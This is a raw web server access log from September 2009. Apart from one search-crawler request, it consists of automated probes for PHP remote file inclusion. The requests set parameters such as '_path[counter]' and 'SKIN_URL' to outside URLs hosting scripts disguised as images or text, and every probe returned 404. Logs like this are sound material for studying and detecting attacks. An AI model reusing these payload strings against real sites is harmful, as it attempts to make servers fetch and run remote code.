74.6.22.87 - - [04/Sep/2009:02:52:24 -0400] "GET /logs/error_log.Q108011000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.11.145.8 - - [04/Sep/2009:02:53:07 -0400] "GET //include/footer.php?_path[counter]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:02:53:07 -0400] "GET /logs//include/footer.php?_path[counter]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:02:53:08 -0400] "GET /logs/access_log.Q109062500%20//include/footer.php?_path[counter]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:02:53:30 -0400] "GET /logs/access_log.Q109062500//include/footer.php?_path[counter]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:02:53:32 -0400] "GET //include/footer.php?_path[counter]=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:02:53:32 -0400] "GET /logs//include/footer.php?_path[counter]=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:02:53:32 -0400] "GET /logs/access_log.Q109062500%20//include/footer.php?_path[counter]=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
69.73.185.40 - - [04/Sep/2009:02:53:41 -0400] "GET /logs/access_log.Q109050700%20%20/php-inc/log.inc.php?SKIN_URL=http://h1.ripway.com/fobe/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:02:53:41 -0400] "GET /php-inc/log.inc.php?SKIN_URL=http://h1.ripway.com/fobe/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:02:53:41 -0400] "GET /logs/php-inc/log.inc.php?SKIN_URL=http://h1.ripway.com/fobe/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.11.145.8 - - [04/Sep/2009:02:54:12 -0400] "GET /logs/access_log.Q109062500%20//include/footer.php?_path[counter]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
